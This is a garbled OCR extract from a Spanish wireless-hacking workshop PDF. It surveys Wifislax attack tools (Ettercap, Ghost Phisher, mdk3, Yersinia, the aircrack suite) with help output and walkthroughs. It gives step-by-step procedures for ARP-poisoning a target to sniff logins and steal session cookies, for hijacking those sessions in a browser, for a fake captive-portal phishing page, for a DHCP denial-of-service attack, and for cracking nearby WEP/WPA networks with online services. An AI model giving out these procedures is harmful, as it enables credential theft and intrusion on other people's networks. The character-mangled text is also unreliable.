8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 121/260

server.errorlog [ @[email protected] [ @[email protected] [ @[email protected] [ @?tmp?ca3ador-ca3ado=DA0?lig7ttpd.log@

+ sustituir inde#.7tml en todos los sitios donde aparece por el nombre delarc7ivo 7tml 5ue descargamos.&na ve3 se conecte alg:n cliente para logearse lo 7ara en nuestro servidor web + sin encriptación por lo 5ue la contrasea viajara en te#to plano.Con otra 7erramienta podemos capturar los logins1ambien podemos crear un arc7ivo p7p para 5ue guarde los logins en unarc7ivo t#t automaticamente.a+ una 7erramienta 5ue +a 7ace todo eso + podemos descargarla desdea5ui

7ttp??7ome.base.be?M<;FeDbM;M4?captiveTportalTis7ing.3ip 

EtherApeEste programa es un monitor gráico de la red a la 5ue estamos conectados.&na ve3 abierto lo primero 5ue tenemos 5ue 7acer es ir a Captura -Interaces + selecionar la 5ue estamos usando 8wlan0 en nuestro caso9"uego pulsamos en Comen3ar + nos mostrara una gráica con todasnuestras cone#iones.

121

Page 122: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 122/260

 

'i pulsamos a7ora en Nodos veremos todos los nodos de la red

Ettercap %rograma capturador de pa5uetes + snier de red.&na ve3 abierto le damos a 'ni - &niied sniing + selecionamos nuestrointerace de red 8wlan0 en nuestro caso9

 7ora se nos abre una nueva ventana con mas opciones

122

Page 123: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 123/260

'i le damos a 'tart- 'tart sniing empe3ara a sniar

"uego vamos a 7ost - scan or 7osts'elecionamos los objetivos 5ue 5ueramos + le damos a dd to 1arget = +

 dd to 1arget <"uego vamos a ,I1, 8,an in t7e midle9 + nos dara la opción de 7acer variosata5ues ,I1, como

 rp poisoning envenenamiento arpicmp redirect redirecionamiento icmp. Redireciona el objetivo a unadeterminada ma5uina. Nos pedira meter la ,C e ip de la misma.%ort stealing Robo de puertos. Nos permite robar puertos abiertos de losobjetivos.!C% 'pooing Nos permite crear un servidor !C%stop mitm attac/s %ara todos los ata5ues 7ombre en el medio.

"ogging) en este apartado podremos guardar los logs.Gho!t 4hi!hererramienta 5ue nos permite mediante dierentes metodos capturar lascredenciales de nuestros objetivos.

a/e ccess %ointCrea un punto de acceso also para 5ue los objetivos seconecten) navegen por internet a traves de nuestro e5uipo + podamos asicapturar sus credenciales.

123

Page 124: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 124/260

Page 125: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 125/260

a/e !C% 'erver Crea un !C% also para asignar direciones ip a losclientes 5ue se conecten a nuestro punto de aceso.

a/e 11% 'erver Crea un servidor 11% para 5ue el cliente al conectarse

va+a a una pagina determinada 8de login9

125

Page 126: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 126/260

Esto es mu+ util en redes wii en las 5ue 7a+ 5ue logearse por5ue da tambienla opcion de clonar un website determinado.

*7ost 1rap En este apartado podemos usar %a+loads de ,etasploit si lotenemos instalado.

126

Page 127: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 127/260

'essión ijac/ing Es un capturador de sesiones 5ue permite capturar sesiones iniciadas por otros e5uipos de la red.&na tengamos las sesiones podemos usarlas + entrar en la web con lasesion +a iniciada sin necesidad de login.

 R% Cac7e %oisoning erramienta para 7acer envenenamiento ip

127

Page 128: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 128/260

 

arvested Credentials en esta pestaa podemos ver las credencialescapturadas e introducirlas nosotros.

 bout Inormación sobre la 7erramienta.

128

Page 129: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 129/260

hping

erramienta avan3ada para 7acer ping con numerosas opciones%odemos verlas al iniciar la 7erramientausage 7ping 7ost _options`-7 --7elp s7ow t7is 7elp-v --version s7ow version-c --count pac/et count-i --interval wait 8uK or K microseconds) or e#ample -i u=0009

--ast alias or -i u=0000 8=0 pac/ets or second9--aster alias or -i u=000 8=00 pac/ets or second9

--lood sent pac/ets as ast as possible. !onVt s7ow replies.-n --numeric numeric output-5 --5uiet 5uiet-I --interace interace name 8ot7erwise deault routing interace9-B --verbose verbose mode-! --debug debugging ino-3 --bind bind ctrlh3 to ttl 8deault to dst port9- --unbind unbind ctrlh3

--beep beep or ever+ matc7ing pac/et received,ode

deault mode 1C%

129

Page 130: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 130/260

  -0 --rawip R$ I% mode-= --icmp IC,% mode-< --udp &!% mode-; --scan 'CN mode.

E#ample 7ping --scan =-D0)M0-F0 -' www.target.7ost-F --listen listen modeI%-a --spoo spoo source address--rand-dest random destionation address mode. see t7e man.--rand-source random source address mode. see t7e man.-t --ttl ttl 8deault 49-N --id id 8deault random9-$ --winid use win id b+te ordering-r --rel relativi3e id ield 8to estimate 7ost traic9

- --rag split pac/ets in more rag. 8ma+ pass wea/ acl9-# --morerag set more ragments lag-+ --dontrag set dont ragment lag-g --rago set t7e ragment oset-m --mtu set virtual mtu) implies --rag i pac/et si3e ^ mtu-o --tos t+pe o service 8deault 0#009) tr+ --tos 7elp-* --rroute includes REC>R!TR>&1E option and displa+ t7e route

buer--lsrr loose source routing and record route--ssrr strict source routing and record route- --ipproto set t7e I% protocol ield) onl+ in R$ I% mode

IC,%-C --icmpt+pe icmp t+pe 8deault ec7o re5uest9- --icmpcode icmp code 8deault 09

--orce-icmp send all icmp t+pes 8deault send onl+ supported t+pes9--icmp-gw set gatewa+ address or IC,% redirect 8deault 0.0.0.09--icmp-ts lias or --icmp --icmpt+pe =D 8IC,% timestamp9--icmp-addr lias or --icmp --icmpt+pe =M 8IC,% address subnet mas/9--icmp-7elp displa+ 7elp or ot7ers icmp options

&!%?1C%-s --baseport base source port 8deault random9-p --destport _h`_h`]port^ destination port8deault 09 ctrlh3 inc?dec-/ --/eep /eep still source port-w --win winsi3e 8deault 49-> --tcpo set a/e tcp data oset 8instead o tcp7drlen ? 49-Q --se5num s7ows onl+ tcp se5uence number-b --badc/sum 8tr+ to9 send pac/ets wit7 a bad I% c7ec/sum

man+ s+stems will i# t7e I% c7ec/sum sending t7e pac/etso +ouVll get bad &!%?1C% c7ec/sum instead.

130

Page 131: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 131/260

Page 132: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 132/260

Intercepterng erramienta completa de intercepción de traico.%odemos escanear la red ) 7acer envenenamiento R% + capturar el tra2co.

 l iniciar la 7erramienta nos abre una consola con menus

132

Page 133: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 133/260

'elecionamos nuestra interace de red 8wlan09+ le damos a A para escanear

Iptra$erramienta con interace en terminal con menus para monitori3ar el traico

de la red.

133

Page 134: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 134/260

 

134

Page 135: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 135/260

MD6 -Acce!! point atact70erramienta para atacar el punto de acceso + dejarlo sin servicio.

 l iniciarlo podemos ver la inormación de la 7erramienta) como se usa + lasopciones 5ue tiene

,! D.0 v - @Yea7) well) w7atever@

b+ '%j o /<wrl3) using t7e osdep librar+ rom aircrac/-ng nd wit7 lots o 7elp rom t7e great aircrac/-ng communit+ ntragon) moongra+) ce) eroTC7aos) irte) t7e/boss) ducttape)tele/0mi/er) "eTBert) sorbo) nd+ *reen) ba7at7ir and !awid *ajowni/1N Y>&P

,! is a proo-o-concept tool to e#ploit common IEEE ;0<.== protocolwea/nesses.I,%>R1N1 It is +our responsibilit+ to ma/e sure +ou 7ave permission romt7e

networ/ owner beore running ,! against it.

135

Page 136: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 136/260

17is code is licenced under t7e *%"v<

,! &'*E

md/D ]interace^ ]testTmode^ _testToptions`1r+ md/D --ull7elp or all test options1r+ md/D --7elp ]testTmode^ or ino about one test onl+

1E'1 ,>!E'b - (eacon lood ,ode

'ends beacon rames to s7ow a/e %s at clients.17is can sometimes cras7 networ/ scanners and even driversP

a - ut7entication !o' mode

'ends aut7entication rames to all %s ound in range.1oo muc7 clients ree3e or reset some %s.p - (asic probing and E''I! (ruteorce mode

%robes % and c7ec/ or answer) useul or c7ec/ing i ''I! 7asbeen correctl+ decloa/ed or i % is in +our adaptors sending range''I! (ruteorcing is also possible wit7 t7is test mode.

d - !eaut7entication ? !isassociation mo/ ,odeic/s ever+bod+ ound rom %

m - ,ic7ael s7utdown e#ploitation 81I%9Cancels all traic continuousl+

# - ;0<.=K testsw - $I!'?$I%' Conusion

Conuse?buse Intrusion !etection and %revention '+stems - ,C ilter bruteorce mode

17is test uses a list o /nown client ,C dresses and tries toaut7enticate t7em to t7e given % w7ile d+namicall+ c7angingits response timeout or best perormance. It currentl+ wor/s onl+on %s w7o den+ an open aut7entication re5uest properl+

g - $% !owngrade test

deaut7enticates 'tations and %s sending $% encr+pted pac/ets.$it7 t7is test +ou can c7ec/ i t7e s+sadmin will tr+ setting 7isnetwor/ to $E% or disable encr+ption.

Medu!aerramienta con interace gráica 8*&I9 para pasar un ic7ero de usuarios +de c7aves para autenticarse en dierentes protocolos

136

Page 137: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 137/260

137

Page 138: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 138/260

Net Acti@it &ie#ererramienta con interace gráica 8*&I9 para ver las cone#iones de redsimilar a netstat.

netcatrerramienta para abrir cone#iones de red) escuc7ar puertos + abrir tunelesde red con muc7as otras opciones.

 l iniciarlo podemos ver la inormación de la 7erramienta) como se usa + lasopciones 5ue tiene

*N& netcat 0.M.=) a rewrite o t7e amous networ/ing tool.

(asic usagesconnect to somew7ere netcat _options` 7ostname port _port` ...listen or inbound netcat -l -p port _options` _7ostname` _port` ...tunnel to somew7ere netcat -" 7ostnameport -p port _options`

,andator+ arguments to long options are mandator+ or s7ort options too.>ptions-c) --close close connection on E> rom stdin-e) --e#ec[%R>*R, program to e#ec ater connect-g) --gatewa+["I'1 source-routing 7op point_s`) up to ;

-*) --pointer[N&, source-routing pointer 4) ;) =<) ...

138

Page 139: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 139/260

Page 140: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 140/260

>tra ventaja es 5ue todas las cone#iones de los clientes conectados pasaranpor nuestro pc por lo 5ue podremos capturarlas con otra 7erramienta como$ires7ar/ o similar.

.ire!har7 Net#or7 AnalKererramienta para anali3ar el tráico de pa5uetes de red.Captura los pa5uetes trasmitidos en la red 8cableada o inalambrica9 +muestra los datos con el ma+or detalle posible.

"o primero 5ue tenemos 5ue 7acer es selecionar el interace 5ue 5ueremosusar para capturar.En nuestro caso marcamos mon0'i no nos aparece mon0 abrimos el terminal + escribimosairmon-ng start wlan0para poner nuestra interace en modo monitor'elecionamos a7ora mon0

"uego le damos a 'tart + empie3a a capturar los pa5uetes

140

Page 141: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 141/260

Con esta 7erramienta podemos capturar el login de usuarios de la red 8si laweb no usa 7ttps9'i la red es abierta podemos capturar directamente los logins de webs sin7ttps 7abilitado'i la red usa encriptación 8wep o wpa9 + tenemos la clave lo primero 5uetenemos 5ue 7acer es ir a

Edit - %reerences - %rotocols - IEE ;0<.==,arcamos Enable decr+ptionEn !escr+ption e+s le damos a Edit - Nuevo,etemos la clave wep o wpa de la red wii 5ue 5ueremos auditar + le damosa plicar

 7ora el programa desencriptara todos los pa5uetes con la clave 5ue ledimos.

Como capturar credenciales con $ires7ar/ 8sitios sin 7ttps9%ara buscar las credenciales de algun cliente en la caja de iltrado ponemos

lo si5uiente seg:n el tipo de credencialCredenciales con %>%pop.re5uest.command [[ @&'ER@ pop.re5uest.command [[ @%''@Credenciales con I,%imap.re5uest contains @login@Credenciales con ',1%smtp.re5.command [[ @&1@iltrando peticiones 11% con el m6todo %>'17ttp.re5uest.met7od [[ @%>'1@Beremos las credenciales en te#to plano siempre 5ue el sitio no use 7ttps

141

Page 142: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 142/260

Como capturar coo7ie! con Ettercap .ire!har7

o+ en dia casi todos los sitios web usan 7ttps por lo 5ue debemos 7acer escapturar la coo/ie. l obtener la coo/ie podremos abrir la web con la sesión +a iniciada sinnecesidad de loginBamos a e#plicar como se 7ar2a paso a paso

%rimero iniciamos Ettercap'ni - &niied sniing'elecionamos la interace 8wlan0 en nuestro caso97ost - scan or 7osts

'elecionamos los 7osts objetivos + los aadimos pulsando dd to target = + dd to target <,itm - rp poisoning - o/'tart - 'tart 'niing

 brimos $ires7ar/'elecionamos la interace o interaces 8wlan0 en nuestro caso9"o dejamos uncionando + esperamos a 5ue 5ue el objetivo se logee enalguna web + wires7ar/ capture los pa5uetes.%onemos en ilter 7ttp.coo/ie contains datrEntre las coo/ies capturadas buscamos la 5ue nos interesaBamos a Coo/ie - (otón derec7o - Cop+ - (+tes - %rintable te#t onl+

 brimos ireo#%ara usar la coo/ie necesitamos *reasemon/ie + Coo/ieinjector pero en elireo# 5ue viene con $iisla# +a lo trae preinstalado.Bamos a la web de la coo/ie 8nos aparecera un poco mas arriba de laCoo/ie9%ulsamos lthC + nos abrira una ventana) pegamos la coo/ie + le damos ao/

Nos abrira la web con la sesión del cliente +a iniciada + podemos navegar dentro de su sesión.

142

Page 143: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 143/260

 er!iniaerramienta con interace gráica 8*&I9 5ue sirve para reali3ar ata5uesmultiples a distintos protocolos + redes.

 l abrir la aplicación lo primero 5ue tenemos 5ue 7acer es ir a

Edit interace,arcar mon0 + darle a o/.

"a 7erramienta dispone de los siguientes ata5ues

C!% Cisco !iscover+ %rotocol. taca los routers cisco 5ue usan esteprotocolo

!C% !+namic ost Coniguration %rotocol. ta5ue de denegacion deservicio al servidor !C%) creación de un servidor !C% also) etc

;0<.=Q %rotocolo de encapsulamiento para evitar intererencias 81run/ing9.Con este ata5ue podemos,andar pa5uetes ;0<.=Q,andar pa5uetes ;0<.=Q con doble encapsulamiento,andar pa5uetes ;0<.=Q para envenenamiento arp. Esto causa denegaciónde servicio en la red 8!>'9

;0<.=# ta5ue a los distintos protocolos de redesCon este ata5ue podemos

,andar pa5uetes R$ ;0<.=K

,itm ;0<.=K con < interaces

143

Page 144: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 144/260

!1% !+namic 1run/ing %rotocol. %rotocolo usado en los router CiscoCon este ata5ue podemos

,andar un pa5uete R$ !1%

abilitar trun/ing'R% ot 'tandb+ Router %rotocolCon este ata5ue podemos

,andar un pa5uete R$ 'R% pac/etacerse un router activoacerse un router activo 8,I1,9

'1% 'panning 1ree %rotocolCon este ata5ue podemos

Enviar Coniguration R$ (%!&Enviar R$ 1CN (%!&Enviar !o' R$ Coniguration (%!&Enviar !o' R$ 1CN (%!&Reclamar privilegios de RootReclamar otros usuariosReclamar privilegios de Root 8,I1,9

Como hacer un ataHue D1C4 D9S con er!inia%rimero selecionamos la interace a usar 8mon0 en nuestro caso9,arcamos !C% + le damos a CaptureBamos a ctions - E#ecute ttac/ - !C%,arcamos la pestaa sending !I'C>BERY pac/et + le damos a o/Iniciara el ata5ue por lo 5ue el !C% 5uedara uera de servicio.%ara cancelar el ata5ue vamos a "ist attac/s - Cancel all attac/s

:enmapInterace *raica 8*&I9 multiplataorma de nmap.Nmap 8GNetwor/ ,apperH9 es una 7erramienta de codigo abierto para

e#plorar la red + reali3ar auditorias de seguridad.Es mu+ sencillo de usar.&na ve3 conectados a internet ponemos en 1arget el objetivo 5ue 5ueremosescanear 8podemos poner la ip o el nombre de dominio9.En nuestro caso ponemos scanme.nmap.org"e damos a scan + nos aparecera toda la inormación del escaneo en lasdistintas pestaasNmap output) %orts?7osts) 1opolog+) 7osts details) 'can

144

Page 145: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 145/260

"uego esta inormación nos será de muc7a utilidad para reali3ar ata5uessobre todo el sistema operativo + los puertos abiertos

Suite aircrac7En este apartado veremos algunas de las 7erramientas la amosa suite paracrac/ear claves de redes wii.

145

Page 146: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 146/260

air3a!engerramienta para crear un ap also

 TTTTT .TT TTT? T TTTTTTTT TT TTTTT TTTTT TTTTT

? ?T T TT TT TT ? TTT? ? TT ? ? T ? TT TTTT TTT?TTTTTT ?TTTT TTT 8TTTT ?TTTT ^ TTT ^

? ? ? ? ?

 irbase-ng - 8C9 <00;-<0== 17omas dV>treppe>riginal wor/ ,artin (ec/7ttp??www.aircrac/-ng.org 

usage write airbase-ng --7elp or see ull optionsuso escribe airbase-ng --7elp para ver todas las opciones de usodescription w7it airbase-ng +ou can create a a/e-apdescripcion con airbase-ng usted podra crear un ap also

wiisla# k airbase-ng --7elp

 irbase-ng =.< beta< r<DM= - 8C9 <00;-<0=D 17omas dV>treppe>riginal wor/ ,artin (ec/7ttp??www.aircrac/-ng.org 

usage airbase-ng ]options^ ]repla+ interace^

>ptions

-a bssid set ccess %oint ,C address-i iace capture pac/ets rom t7is interace-w $E% /e+ use t7is $E% /e+ to en-?decr+pt pac/ets-7 ,C source mac or ,I1, mode

- disallow disallow speciied client ,Cs 8deault allow9-$ 0= _donVt` set $E% lag in beacons 0= 8deault auto9-5 5uiet 8do not print statistics9-v verbose 8print more messages9- d-oc ,ode 8allows ot7er clients to peer9-Y inoutbot7 e#ternal pac/et processing-c c7annel sets t7e c7annel t7e % is running on-K 7idden E''I!-s orce s7ared /e+ aut7entication 8deault auto9-' set s7ared /e+ c7allenge lengt7 8deault =<;9

146

Page 147: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 147/260

  -" Cae-"atte $E% attac/ 8use i driver canVt send rags9-N crag $E% attac/ 8recommended9-# nbpps number o pac/ets per second 8deault =009-+ disables responses to broadcast probes

-0 set all $%)$E%)open tags. canVt be used wit7 -3 W --3 t+pe sets $%= tags. =[$E%40 <[1I% D[$R% 4[CC,%A[$E%=04

- t+pe same as -3) but or $%<-B t+pe a/e E%>" =[,!A <['= D[auto- prei# write all sent and received rames into pcap ile-% respond to all probes) even w7en speci+ing E''I!s-I interval sets t7e beacon interval value in ms-C seconds enables beaconing o probed E''I! values 8re5uires -%9

 ilter options--bssid ,C (''I! to ilter?use--bssids ile read a list o (''I!s out o t7at ile--client ,C ,C o client to ilter--clients ile read a list o ,Cs out o t7at ile--essid E''I! speci+ a single E''I! 8deault deault9--essids ile read a list o E''I!s out o t7at ile

--7elp !ispla+s t7is usage screen

Aircrac7te!terramienta para ver la velocidad de aircrac/

 TTTT TT TTTTTTTTT TTT TTT TTTT? ? ?TTTT TTTTT? ?T? TTT? TT ? T ? T ? TT ? TT? T ? TTT? TT?

8TT 9 ?T? ? TT? TT? ?T? ? ?T? TT8TT 9 ?T?TTTT? .TTT?TTT?TTT?TT)T?TT?TTT?TTTT?TT?

?T?

%owered b+ "ampiweb

IC 1ECNIC !E" C%& r5uitectura i;?D<-bit)4-bit N\ Nucleos <C%& ,3 <<00.000 abricante *enuineIntel "< cac7e =0<4C%&8s9 detectada8s9 por ircrac/-ng < 8''E< available9

Calibrando la velocidad aircra/-ng... espere A segundos...

--------------------------------------------------------------------

147

Page 148: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 148/260

  ircrac/-ng Belocidad - === pass?segundos--------------------------------------------------------------------

Air!er@ng

'ervidor para tarjetas wireless 5ue permite m:ltiples aplicaciones + usar programas wireless independientemente de la tarjeta + del driver) a trav6s deuna cone#ión de red 1C% cliente-servidor

 TTTTT .TT? T TTTTTTTT TTTTTT TTTTTTTTTTTTTT TT TTTT TTTT

? ?T T TT ? TTT?? TT T TT ? ? TTTTTT ? ? TTT? ?TTT TTT? ? ? ?TTTTT? ? ?T? ^TTTTTT ?TTTT ?TTTT ^TTT ^TT T? TTT ?TTT ?

? ? ? ??TTTTT?

 irserv-ng - 8C9 <00M) <00;) <00F ndrea (ittau7ttp??www.aircrac/-ng.org 

&sage airserv-ng ]options^

>ptions

-7 17is 7elp screen-p ]port^ 1C% port to listen on 8deault9-d ]iace^ $ii interace to use-c ]c7an^ C7annel to use-v ]level^ !ebug level 8= to DL deault =9

Airtunng erramienta para crear tuneles virtuales para crear tuneles de interacesvirtuales denominadas Gtunnel interaceH.%ermite,onitori3ar todo el tráico encriptado con propósitos wI!' 8wireless Intrusion

!etection '+stem9.In+ectar de orma arbitraria tráico en una red. l iniciar el programa podemos ver su uso + si ponemos airtun-ng --7elp lasdistintas opciones disponibles

 TTTTT .TT TT? T TTTTTTTTT? T TT TT TTTT TTTT TTTT

? ?T T TT TT ? TTTTTT ? ? TTT? ? ? ?TTTTT? ? ?T? ^TTTTTT ?TTTT TT TTTT?TTT ? TTT ?TTT ?

? ? ??TTTTT?

148

Page 149: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 149/260

 

 irtun-ng - 8C9 <00) <00M) <00;) <00F 17omas dV>treppe>riginal wor/ C7ristop7e !evine and ,artin (ec/

7ttp??www.aircrac/-ng.org usage airtun-ng --7elp to see all options o use.uso airtun-ng --7elp para ver todas las opciones de uso.

wiisla# k airtun-ng --7elp

 irtun-ng =.< beta< r<DM= - 8C9 <00-<0=D 17omas dV>treppe>riginal wor/ ,artin (ec/7ttp??www.aircrac/-ng.org 

usage airtun-ng ]options^ ]repla+ interace^

-# nbpps number o pac/ets per second 8deault =009-a bssid set ccess %oint ,C address

In $!' ,ode t7is sets t7e Receiver-i iace capture pac/ets rom t7is interace-+ ile read %R* rom t7is ile-w wep/e+ use t7is $E%-EY to encr+pt pac/ets-t tods send rames to % 8=9 or to client 809

or tunnel t7em into a $!'?(ridge 8<9-r ile read rames out o pcap ile

$!'?(ridge ,ode options-s transmitter set 1ransmitter ,C address or $!' ,ode-b bidirectional mode. 17is enables communication

in 1ransmitterVs N! ReceiverVs networ/s. $or/s onl+ i +ou can see bot7 stations.

Repeater options--repeat activates repeat mode--bssid ]mac^ (''I! to repeat--netmas/ ]mas/^ netmas/ or (''I! ilter

--7elp !ispla+s t7is usage screen

Como todo el tráico encriptado con airtun-ng

149

Page 150: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 150/260

%onemos la tarjeta wireless en modo monitor + escribimos el comando

airtun-ng -a 00=4CME40;0 -w =<D4AM;F0 at70

!onde-a 00=4CME40;0 es la dirección ,C del punto de acceso a

monitorear-w =<D4AM;F0 es la clave de encriptaciónat70 es la interace 5ue tenemos en modo monitor

El sistema nos contestará

created tap interace at0

$E% encr+ption speciied. 'ending and receiving rames t7roug7 at70.rom!' bit set in all rames.

!ate cuenta 5ue se 7a creado la interace at0. bre otra consola o s7ell +puedes levantar esta interace para poder usarla

iconig at0 up

Esta interace 8at09 recivirá una copia de cada pa5uete wireless 5ue circulepor la red. "os pa5uetes serán desencriptados con la clave 5ue 7asproporcionado.En este punto) puedes usar alg:n programa para esniar + anali3ar el tráico.%or ejemplo) tcpdump o snort.

Be!!ideng erramienta 5ue rompe automáticamente todas las claves $E% en nuestrorango + registrar los 7ands7a/es de $%. TTTTTTTTTT .TT .TTTTTTTTT TTTT TTTTTT TTTTTTT TT T?TTTT TTTT TTTT

T?? TT ? TTT?? TTT? ? TT ? TT TTTTTT ? ? TTT TTT? TTT TTT ? ?T? TTT? ?TTTTT? ? ?T? ^TTTTTT ?TTT ^TTTT ^TTTT ^TTTTTT TTT ^ TTT ?TTT ?

? ? ? ? ? ? ??TTTTT?

(esside-ng - 8C9 <0== ndrea (ittau7ttp??www.aircrac/-ng.org 

&sage besside-ng _options` ]interace^

150

Page 151: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 151/260

 >ptions

-b ]victim mac^ Bictim (''I!

-s ]$% server^ &pload wpa.cap or crac/ing-c ]c7an^ c7anloc/-p ]pps^ lood rate-$ $% onl+-v verbose) -vv or more) etc.-7 17is 7elp screen

"os 7ands7a/es $% capturados se pueden cargar en el servicio de crac/wpa en l2nea como7ttp??wpa.dar/ircop.org 

7ttp??wpa-sec.stanev.org  e+ aF;cA40d0=caMeaDdADaDdFDcMe07ttps??gpu7as7.me 

 lgunos ejemplos%ara crac/ear todas las redes $E% en nuestro rango + obtener los7ands7a/es $%besside-ng mon0

%ara conseguir el 7ands7a/e $% de un objetivo determinado 8canal +(''I!9besside-ng -$ -c -b 0000==<<DD44 mon0

%ara ver el arc7ivo de logcat besside.log+ aparecera el log ''I! EY (''I! ,C iltervodaoneEM4 *ot $% 7ands7a/e <FbdeMa4 ,>BI'1RTMC<E *ot $% 7ands7a/e ;=ba<McDM

1anto las capturas de ls 7and7a/es wpa como los logs los guarda en lacarpeta personal ?root?%ara subir el arc7ivo vamos a alguno de los servicio de crac/ wpa en l2neade arrivapor ejemplo wpa.dar/ircop.org le damos a e#aminar selecionamos el arc7ivowpa.cap + le damos a aceptar +

151

Page 152: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 152/260

airo!cript ralin7#i$i!la''cript identico a airoscript con menu de selección 5ue no necesita introducir comandas para acilitar la tarea de crac/ing $E%?$% especialmentediseado para usar con tarjetas ralin/.

 l iniciar la 7erramienta podemos ver las distintas opciones

iroscript-ralin/

 utodetectando Resolución... =D#M;

'elecciona una interace

=9 et70<9 wlan0D9 mon0S D

IN> IN1ER

Intera3 [ mon0 ? modo ,onitorC7ipset?!river [ t7eros RF<;0 -

1u ,C [ 00=Mc4dDF0A4

IN> IN1ER

Intera3 [ mon0 ? modo ,onitorC7ipset?!river [ t7eros RF<;0 -

1u ,C [ 00=Mc4dDF0A4

,EN& %RINCI%"

=9 Escanear -(uscar >bjetivos<9 'eleccionar -'eleccionar >bjetivoD9 ta5ues -tacar >bjetivo49 Crac/ear -,enu Crac/earA9 uto -(uscar e+ utomaticamente9 !esautenticar -!esautenticar del >bjetivoM9 In+ección -,enu de In+ección;9 >pciones van3adas -&tilidades Barias

152

Page 153: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 153/260

  F9 'alir -Cerrar iroscript

^ =

'E"ECCI>N ,>!> !E (•'Q&E!=9 'in iltros<9 >%ND9 $E%49 $%A9 $%<9 $% + $%<

^ =

'E"ECCI>N CN"

=9 1odos los canales<9 Canal8es9 espec2ico8s9

^ =

IN> IN1ER

Intera3 [ mon0 ? modo ,onitorC7ipset?!river [ t7eros RF<;0 -

1u ,C [ 00=Mc4dDF0A4

,EN& %RINCI%"

=9 Escanear -(uscar >bjetivos<9 'eleccionar -'eleccionar >bjetivo

